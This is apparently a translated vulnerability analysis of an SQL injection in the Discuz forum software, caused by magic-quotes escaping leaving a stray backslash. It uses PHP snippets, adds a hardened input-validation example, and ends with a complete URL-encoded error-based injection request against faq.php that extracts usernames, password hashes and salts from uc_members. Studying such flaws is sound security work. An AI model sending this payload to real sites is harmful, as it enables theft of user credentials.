Discuz attracting attention has become the norm (a tall tree catches the wind), but is it really any different for other whole-site programs? Do you still remember the days of Phpcms and DedeCMS? For a widely deployed whole-site program, what matters most is how quickly it responds to a vulnerability.
0x01 Vulnerability cause:
The section "New security issues with magic quotes" in the article "Advanced PHP Application Vulnerability Audit Technology" describes the security problem caused by the "\" character that magic-quotes style escaping leaves behind. This vulnerability is a textbook instance of that problem, as the following code snippet shows:
```php
<?php
//foo.php?xigr='ryat

function daddslashes($string, $force = 0) {
    // Discuz-era code: get_magic_quotes_gpc() only exists on PHP < 8
    !defined('MAGIC_QUOTES_GPC') && define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());
    if (!MAGIC_QUOTES_GPC || $force) {
        if (is_array($string)) {
            // escape every element recursively
            foreach ($string as $key => $val) {
                $string[$key] = daddslashes($val, $force);
            }
        } else {
            // a plain string is escaped as a whole, no type check on the caller's side
            $string = addslashes($string);
        }
    }
    return $string;
}
...
foreach (array('_COOKIE', '_POST', '_GET') as $_request) {
    foreach ($$_request as $_key => $_value) {
        // register every request key (except those starting with "_") as a global variable;
        // the original uses $_key{0}, the curly-brace string offset syntax removed in PHP 8
        $_key[0] != '_' && $$_key = daddslashes($_value);
    }
}

echo $xigr['hi'];
```
The code above expects $xigr['hi'] to be an element of an array that has already passed through daddslashes(), but it never checks the type of $xigr. If we submit a plain string xigr='ryat, the processing above turns it into \'ryat, and $xigr['hi'] (a non-numeric string offset, which older PHP treats as offset 0) then yields the single character \. If that value is introduced into an SQL statement it causes a serious security problem. Now look at the following code snippet:
```php
<?php
if ($xigr) {
    // $xigr is assumed to be an array of arrays, but its type is never checked
    foreach ($xigr as $k => $v) {
        $uids[] = $v['uid'];
    }

    // each uid is wrapped in single quotes; a uid whose escaping was broken by the
    // stray "\" from the previous snippet closes the quote early
    $query = $db->query("SELECT uid FROM users WHERE uid IN ('" . implode("','", $uids) . "')");
}
```
Using the idea described above, submitting foo.php?xigr[]='&xigr[][uid]=evilcode easily bypasses GPC escaping and similar protections, which results in an SQL injection vulnerability.
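A hardened version of the second snippet, added here as an illustration and not taken from Discuz or the original analysis: the input shape is checked before anything reaches SQL, and the IN (...) list is built from validated integers only, so the stray "\" from the escaping layer can never become the first character of a quoted value. The helper names collect_uids and build_uid_query are hypothetical, and the inputs are constructed samples.

```php
<?php
// Hypothetical helper: returns a list of validated integer uids, or null when the
// request has the wrong shape (a string instead of an array, a missing uid key,
// or a uid that is not purely numeric).
function collect_uids($xigr): ?array {
    if (!is_array($xigr)) {
        return null;              // a bare string is exactly what produced "\" above
    }
    $uids = [];
    foreach ($xigr as $v) {
        if (!is_array($v) || !isset($v['uid'])) {
            return null;          // every element must itself be an array with a uid key
        }
        if (!is_string($v['uid']) && !is_int($v['uid'])) {
            return null;
        }
        if (!preg_match('/^\d{1,10}$/', (string) $v['uid'])) {
            return null;          // digits only: nothing to quote, nothing to escape
        }
        $uids[] = (int) $v['uid'];
    }
    return $uids ?: null;
}

// The values are integers, so they are interpolated without quotes and the
// behaviour of addslashes()/magic quotes no longer matters for this query.
function build_uid_query(array $uids): string {
    return 'SELECT uid FROM users WHERE uid IN (' . implode(',', $uids) . ')';
}

// Constructed sample inputs mirroring the shapes discussed in the text.
$cases = [
    'well-formed'  => [['uid' => '12'], ['uid' => '34']],
    'string param' => addslashes("'ryat"),                 // xigr='ryat after daddslashes()
    'array trick'  => ["'", ['uid' => 'evilcode']],        // xigr[]='&xigr[][uid]=evilcode
];
foreach ($cases as $name => $input) {
    $uids = collect_uids($input);
    echo str_pad($name, 13), ': ', $uids === null ? 'rejected' : build_uid_query($uids), PHP_EOL;
}
```

Only the well-formed case produces a query; the string and the crafted array are both rejected before any SQL is built, which is the check the original code lacks.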
0x02 Vulnerability Test
Request used to test for the vulnerability and dump username + password + salt:
http://xss.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20% 28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,password,0x3a,salt% 29%20from%20uc_members%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables% 20group%20by%20x%29a%29%23
Compiled from the FreeBuf analysis and http://www.80vul.com/webzine_0x06/PSTZine_0x06_0x03.txt